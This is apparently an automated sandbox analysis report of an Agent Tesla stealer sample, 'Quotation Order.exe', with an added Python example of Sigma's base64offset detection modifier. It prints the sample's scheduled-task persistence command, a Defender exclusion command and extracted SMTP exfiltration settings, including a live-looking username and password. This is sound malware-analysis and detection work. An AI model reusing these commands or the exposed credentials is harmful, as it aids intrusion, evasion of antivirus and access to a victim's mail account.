ProcessId: 7216, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, ProcessId: 7488, ProcessName: svchost.exe
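The CommandLine|base64offset|contains field in the evidence above comes from Sigma's base64offset modifier, which the matched "Powershell Base64 Encoded MpPreference Cmdlet" rule uses so that Add-MpPreference is found even when the command line only carries it in base64. A string can land at three different byte alignments inside a base64 stream, each giving a different encoding, and the characters that straddle a neighbouring byte must be discarded from each variant. The following Python is an added example, not code from the report or from the SigmaHQ rule; it reimplements the modifier and adds the caveat that matters for this sample: PowerShell's -EncodedCommand is base64 over UTF-16LE, so the plain variants never match it and a rule needs the wide form as well. The command embedded below is the exclusion command from the process tree, re-encoded here as a constructed input.

```python
"""Sigma's base64offset modifier, reimplemented to show why it needs three
variants and why PowerShell -EncodedCommand also needs the wide (UTF-16LE) form.
"""
import base64

# Characters dropped at the start/end of each alignment, as in the Sigma spec:
# a base64 character that mixes bits from a neighbouring byte cannot be trusted.
START_OFFSETS = (0, 2, 3)
END_OFFSETS = (None, -3, -2)


def base64offset(value: str, wide: bool = False) -> list:
    """Return the three base64 substrings that cover every byte alignment of
    `value`. With wide=True the value is UTF-16LE encoded first (Sigma |wide|)."""
    raw = value.encode("utf-16le" if wide else "utf-8")
    variants = []
    for shift in range(3):
        enc = base64.b64encode(b" " * shift + raw).decode("ascii")
        variants.append(enc[START_OFFSETS[shift]:END_OFFSETS[(len(raw) + shift) % 3]])
    return variants


def matches_encoded(needle: str, b64_blob: str, wide: bool = False) -> bool:
    """Does the base64 blob contain `needle` at any alignment?"""
    return any(v in b64_blob for v in base64offset(needle, wide))


def encode_powershell(command: str) -> str:
    """What powershell.exe expects after -EncodedCommand: base64 of UTF-16LE."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


def alignment_check(needle: str, wide: bool = False) -> bool:
    """Embed the needle after 0..5 junk bytes and confirm a variant always matches."""
    raw = needle.encode("utf-16le" if wide else "utf-8")
    return all(
        matches_encoded(needle, base64.b64encode(b"x" * k + raw + b"yyy").decode("ascii"), wide)
        for k in range(6)
    )


# Constructed example: the exclusion command from the report, as it would
# appear if the loader had used -EncodedCommand instead of a clear-text line.
CLEAR_COMMAND = 'Add-MpPreference -ExclusionPath "C:\\Users\\user\\AppData\\Roaming\\svchost.exe" -Force'
ENCODED_COMMAND = encode_powershell(CLEAR_COMMAND)

if __name__ == "__main__":
    print("utf-8 variants :", base64offset("Add-MpPreference"))
    print("wide variants  :", base64offset("Add-MpPreference", wide=True))
    print("plain match    :", matches_encoded("Add-MpPreference", ENCODED_COMMAND))
    print("wide match     :", matches_encoded("Add-MpPreference", ENCODED_COMMAND, wide=True))
```

For Add-MpPreference the plain variants are QWRkLU1wUHJlZmVyZW5jZ, FkZC1NcFByZWZlcmVuY2 and BZGQtTXBQcmVmZXJlbmNl; none of them occurs in the UTF-16LE encoding of the same command, which is why a detection that only covers the UTF-8 alignments misses the -EncodedCommand form that this loader could just as easily have used.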

Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation Order.exe", ParentImage: C:\Users\user\Desktop\Quotation Order.exe, ParentProcessId: 7384, ParentProcessName: Quotation Order.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ProcessId: 7912, ProcessName: cmd.exe
No Snort rule has matched

AV Detection

Source: 26.2.AddInProcess32.exe.400000.0.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.bonnyriggdentalsurgery.com.au", "Username": "hr1@bonnyriggdentalsurgery.com.au", "Password": "Sages101*"}
Source: C:\Users\user\AppData\Roaming\svchost.exe | ReversingLabs: Detection: 31%
Source: Quotation Order.exe | ReversingLabs: Detection: 31%
Source: Quotation Order.exe | Virustotal: Detection: 28%

Exploits

Source: Yara match | File source: 00000000.00000002.1287260691.0000025980041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000034.00000002.1652420227.000002DFB9BBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1482838005.00000153C09BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000002.1488978955.0000026BB4FDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.1454297088.000001FC8F1F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Quotation Order.exe PID: 7384, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 8072, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 8164, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 7412, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 6284, type: MEMORYSTR
Source: Quotation Order.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Core.pdbmscorlib.dllSystem.dll@ source: WER46C7.tmp.dmp.46.dr
Source: Binary string: System.Windows.Forms.ni.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
Source: Binary string: System.Drawing.ni.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbpdb source: svchost.exe, 0000000F.00000002.1525069832.00000153D8F99000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
Source: Binary string: AddInProcess32.pdbpw source: avdfUcC.exe, 00000032.00000000.1504143602.0000000000CF2000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: svchost.exe, 0000000F.00000002.1524720197.00000153D8F75000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Drawing.ni.pdbRSDS source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: svchost.exe, 0000000F.00000002.1525069832.00000153D8F99000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.VisualBasic.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
Source: Binary string: System.Core.ni.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
Source: Binary string: System.Management.pdb source: WER46C7.tmp.dmp.46.dr
Source: Binary string: mscorlib.pdb` source: WER2499.tmp.dmp.32.dr
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
Source: Binary string: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini\??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: svchost.exe, 0000000F.00000002.1480472904.00000153BE8AE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.ni.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: svchost.exe, 0000000F.00000002.1525069832.00000153D8F99000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb} source: svchost.exe, 0000000F.00000002.1480472904.00000153BE8AE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: WER2499.tmp.dmp.32.dr
Source: Binary string: pC:\Users\user\AppData\Roaming\svchost.PDB source: svchost.exe, 0000000F.00000002.1472717791.000000458E6F3000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: fic.pdbn source: svchost.exe, 0000000F.00000002.1524720197.00000153D8F75000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.VisualBasic.pdb` source: WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbCon source: svchost.exe, 0000000F.00000002.1525069832.00000153D8F99000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: svchost.exe, 0000000F.00000002.1525069832.00000153D8F97000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
Source: Binary string: System.Windows.Forms.pdbH source: WER1C4C.tmp.dmp.35.dr
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: svchost.exe, 0000000F.00000002.1524720197.00000153D8F75000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.ni.pdbRSDS source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
Source: Binary string: C:\Users\user\AppData\Roaming\svchost.PDB source: svchost.exe, 0000000F.00000002.1472717791.000000458E6F3000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbpdb source: svchost.exe, 0000000F.00000002.1525069832.00000153D8F97000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.pdb#( source: WER2499.tmp.dmp.32.dr
Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbmeerCo source: svchost.exe, 0000000F.00000002.1525069832.00000153D8F99000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb@ source: WER1C4C.tmp.dmp.35.dr
Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
Source: Binary string: System.Windows.Forms.pdbpHj! source: WER46C7.tmp.dmp.46.dr
Source: Binary string: System.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: System.Windows.Forms.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: mscorlib.pdb" source: WER1C4C.tmp.dmp.35.dr
                    Source: Binary string: AddInProcess32.pdb source: avdfUcC.exe, 00000032.00000000.1504143602.0000000000CF2000.00000002.00000001.01000000.00000009.sdmp
                    Source: Binary string: mscorlib.pdb source: svchost.exe, 0000000F.00000002.1481132072.00000153BE8F2000.00000004.00000020.00020000.00000000.sdmp, WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: System.Object InvokeMethod(System.Object, System.Object[], System.Signature, Boolean)\??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: svchost.exe, 0000000F.00000002.1525069832.00000153D8F99000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Management.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: System.Drawing.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: System.Management.ni.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: caspol.pdb source: avdfUcC.exe.31.dr
                    Source: Binary string: System.Core.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbxko source: svchost.exe, 0000000F.00000002.1481132072.00000153BE8F2000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: svchost.PDB source: svchost.exe, 0000000F.00000002.1472717791.000000458E6F3000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: System.ni.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: System.Core.ni.pdbRSDS source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr

                    Networking

                    Source: Yara match; File source: 26.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 17.2.svchost.exe.1fc9f1fd6c0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 17.2.svchost.exe.1fc9f239308.2.raw.unpack, type: UNPACKEDPE
                    Source: global traffic; HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                    Source: global traffic; HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                    Source: global traffic; HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                    Source: global traffic; HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                    Source: Joe Sandbox View; IP Address: 208.95.112.1 208.95.112.1
                    Source: Joe Sandbox View; IP Address: 192.254.225.166 192.254.225.166
                    Source: Joe Sandbox View; ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                    Source: unknown; DNS query: name: ip-api.com
                    Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global traffic; HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                    Source: global traffic; HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                    Source: global traffic; HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                    Source: global traffic; HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                    Source: global traffic; DNS traffic detected: DNS query: ip-api.com
                    Source: global traffic; DNS traffic detected: DNS query: mail.bonnyriggdentalsurgery.com.au
                    Source: svchost.exe, 00000024.00000003.1426512052.000002B805E10000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1426050902.000002B805775000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS
                    Source: svchost.exe, 00000024.00000003.1400049966.000002B805774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
                    Source: svchost.exe, 00000024.00000003.1360706982.000002B805729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1400049966.000002B805774000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1390230532.000002B80572F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1380858399.000002B805729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1390230532.000002B80572A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb
                    Source: svchost.exe, 00000024.00000003.1390016964.000002B804EE4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2516290801.000002B804EE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb_
                    Source: svchost.exe, 00000024.00000002.2518501231.000002B805C59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2519109221.000002B805CB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tbpose
                    Source: svchost.exe, 00000024.00000002.2518170013.000002B805C13000.00000004.00000020.00020000.00000000.sdmp, 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.36.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
                    Source: svchost.exe, 00000024.00000002.2515299531.000002B804E73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1425819438.000002B804E72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01
                    Source: svchost.exe, 00000024.00000003.1426050902.000002B805775000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1389451722.000002B805735000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                    Source: svchost.exe, 00000024.00000002.2517767699.000002B805778000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1426108352.000002B805776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1400049966.000002B805774000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1426050902.000002B805775000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd(
                    Source: svchost.exe, 00000024.00000003.1360706982.000002B805729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAAA
                    Source: svchost.exe, 00000024.00000003.1400049966.000002B805774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdesA
                    Source: svchost.exe, 00000024.00000003.1400049966.000002B805774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdesEncr
                    Source: svchost.exe, 00000024.00000002.2517767699.000002B805778000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1426108352.000002B805776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1426050902.000002B805775000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdonMe
                    Source: svchost.exe, 00000024.00000003.1425060202.000002B805783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-sod
                    Source: svchost.exe, 00000024.00000003.1426050902.000002B805775000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1389451722.000002B805735000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                    Source: svchost.exe, 00000024.00000003.1400049966.000002B805774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd(
                    Source: svchost.exe, 00000024.00000002.2517767699.000002B805778000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1426108352.000002B805776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1426050902.000002B805775000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd.
                    Source: svchost.exe, 00000024.00000003.1400049966.000002B805774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd0nw
                    Source: svchost.exe, 00000024.00000002.2517767699.000002B805778000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1426108352.000002B805776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1426050902.000002B805775000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA
                    Source: svchost.exe, 00000024.00000003.1360706982.000002B805729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAA
                    Source: svchost.exe, 00000024.00000003.1389377028.000002B805735000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1399093323.000002B805735000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1389451722.000002B805735000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdpServ
                    Source: svchost.exe, 00000024.00000003.1400049966.000002B805774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds
                    Source: svchost.exe, 00000024.00000002.2519461243.000002B805CF0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1426345130.000002B805C44000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2518233779.000002B805C37000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2519335064.000002B805CD4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1402825732.000002B80570F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID
                    Source: AddInProcess32.exe, 0000001A.00000002.1487009646.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1627243849.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2520439287.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2517527074.000000000325C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                    Source: svchost.exe, 00000011.00000002.1465404864.000001FC9F1C1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1472724735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1487009646.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1627243849.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2520439287.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2517527074.000000000325C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                    Source: AddInProcess32.exe, 0000001A.00000002.1487009646.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1487009646.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1627243849.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1627243849.0000000002D79000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2520439287.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2517527074.00000000032B7000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2517527074.00000000032AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.bonnyriggdentalsurgery.com.au
                    Source: svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://passport.net/tb
                    Source: AddInProcess32.exe, 0000001A.00000002.1477526079.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1513494565.0000000005FA4000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1487009646.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1647286453.0000000005EB2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1627243849.0000000002D79000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2515186191.0000000001154000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2543086036.0000000006090000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2520439287.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2517527074.00000000032B7000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2513830671.000000000114B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2513830671.000000000115C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/0T
                    Source: AddInProcess32.exe, 0000001A.00000002.1513494565.0000000005F80000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1477526079.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1513494565.0000000005FA4000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1487009646.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1647286453.0000000005EB2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1627243849.0000000002D79000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2515186191.0000000001154000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2543086036.0000000006090000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2520439287.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2517527074.00000000032B7000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2513830671.000000000114B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2513830671.000000000115C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.o.lencr.org0
                    Source: svchost.exe, 00000024.00000002.2517369366.000002B805737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: svchost.exe, 00000024.00000002.2517123888.000002B805713000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                    Source: svchost.exe, 00000024.00000002.2517123888.000002B805713000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                    Source: svchost.exe, 00000024.00000002.2517369366.000002B805737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scon
                    Source: svchost.exe, 00000024.00000002.2517472650.000002B80575F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scrf
                    Source: svchost.exe, 00000024.00000003.1434799034.000002B805766000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scs-cbc
                    Source: svchost.exe, 00000024.00000002.2517880244.000002B805791000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1425939517.000002B80578D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scyc=
